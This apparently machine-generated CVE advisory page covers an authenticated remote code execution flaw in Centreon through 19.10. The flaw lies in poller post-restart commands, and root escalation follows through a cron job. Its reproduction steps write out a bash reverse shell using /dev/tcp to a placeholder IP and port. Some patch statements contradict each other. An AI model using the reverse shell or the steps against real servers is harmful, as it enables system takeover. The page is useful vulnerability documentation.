CVE-2019-19699
Description
Authenticated remote code execution in Centreon ≤ 19.10 via Pollers misconfiguration allows apache user to execute commands as root via a cron job.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
An authenticated remote code execution vulnerability exists in Centreon Infrastructure Monitoring Software through version 19.10 [1][2][3]. The issue lies in the Pollers configuration: an administrator with access to the Centreon Web Interface can create a custom command via main.php?p=60803&type=3 and then assign it as a Post-Restart Command for a poller via main.php?p=60901&o=c&server_id=1 [3]. When the poller configuration is exported, the command is executed. Due to a misconfiguration in the apache crontab, an executable file modified by the apache user runs as root daily at 22:30 [3][4].
Exploitation
An attacker must have Admin access to the Centreon Web Interface [3][4]. The attacker creates a malicious miscellaneous command (e.g., a bash reverse shell) via Configuration > Commands > Miscellaneous, then assigns it to the Centreon central poller as a Post-Restart Command via Configuration > Pollers > Modify a poller Configuration [3]. The attacker then exports the poller configuration with the "Restart Monitoring Engine" and "Post generation command" options checked, and selects "Restart" [3]. This triggers the poller restart, executing the malicious command as the apache user [3]. The attacker subsequently leverages a cron job (e.g., /etc/cron.d/centreon_autodisc.pl) that runs as root to escalate privileges [3][4].
Impact
Successful exploitation results in remote code execution as the apache user initially, followed by privilege escalation to root via a misconfigured cron job [3][4]. The attacker gains full system compromise, including the ability to execute arbitrary commands, modify system files, and persist access [4]. The CIA impact is complete: confidentiality, integrity, and availability are all compromised [3][4].
Mitigation
Centreon released fixes after version 19.10 [1][3]. Users should upgrade to a supported version of Centreon (e.g., Centreon Web 24.04.26 or later) [1]. If upgrading is not immediately possible, restrict Admin access to the Centreon Web Interface to trusted users only, and review and disable any custom miscellaneous commands or poller post-restart commands that are not required [3][4]. According to the CVE description, this issue was found in versions through 19.10; no KEV listing was observed at the time of publication.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Centreon / Infrastructure Monitoring Software
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing access control on the Poller Post-Restart Command configuration allows an Admin user to set an arbitrary command that executes with the privileges of the monitoring engine when the poller restarts."
Attack vector
An authenticated attacker with Admin access to the Centreon Web Interface creates a malicious Miscellaneous command (e.g., a bash reverse shell) via Configuration > Commands > Miscellaneous [ref_id=1]. The attacker then navigates to Configuration > Pollers, selects the Central poller, and sets the Post-Restart Command to the previously created malicious command [ref_id=1]. When the attacker exports the poller configuration with the "Restart Monitoring Engine" and "Post generation command" options enabled, the poller restarts and executes the attacker's command [ref_id=1]. This gives the attacker a reverse shell as the apache user, which can then be leveraged for privilege escalation via cron-based attacks [ref_id=1].
Affected code
The vulnerability lies in the Poller configuration functionality accessible via main.php?p=60901&o=c&server_id=1 [ref_id=1]. The Post-Restart Command field allows an Admin to select any Miscellaneous command (created via main.php?p=60803&type=3) without sanitization or privilege checks on the command content [ref_id=1]. The export mechanism at Configuration > Pollers triggers execution of this command when the poller restarts [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory does not specify a vendor fix; the CVE affects Centreon through version 19.10 [ref_id=1]. The recommended mitigation is to restrict Admin access to trusted users only and to monitor the Post-Restart Command configuration for unauthorized changes [ref_id=1]. The researcher's walkthrough also demonstrates that privilege escalation via cron misconfiguration (CVE-2019-16406) can follow, so administrators should additionally secure cron jobs executed by root [ref_id=1].
Preconditions
- auth: Attacker must have Admin-level access to the Centreon Web Interface.
- network: Attacker must have network access to the Centreon Web Interface.
- input: Attacker must create a malicious Miscellaneous command and set it as the Post-Restart Command for a poller.
Reproduction
1. Log in as Admin to the Centreon web panel.
2. Navigate to Configuration > Commands > Miscellaneous, click Add, and create a bash reverse shell: `#!/bin/bash\nbash -i >& /dev/tcp/{IP}/{PORT} 0>&1`. Click Save.
3. Navigate to Configuration > Pollers, click on the Central poller.
4. Scroll down to "Post-restart command", select the reverse shell command, and click Save.
5. Start a Netcat listener on your machine.
6. Click Export configuration in Configuration > Pollers, select the Central poller, untick "Generate Configuration Files" and "Run monitoring engine debug (-v)", tick "Restart Monitoring Engine" and "Post generation command", select "Restart" as Method, and click Export.
7. The reverse shell connects to your listener [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- download.centreon.com (MISC)
- spenge.pw/cves/ (MISC)
- twitter.com/SpengeSec/status/1204418071764463618 (MISC)
- www.centreon.com (MISC)
News mentions
- Weekly Metasploit Update: Apache ActiveMQ RCE, Gogs Rebase RCE, and Windows Kernel Pointer Enum (Rapid7 Blog · Jun 5, 2026)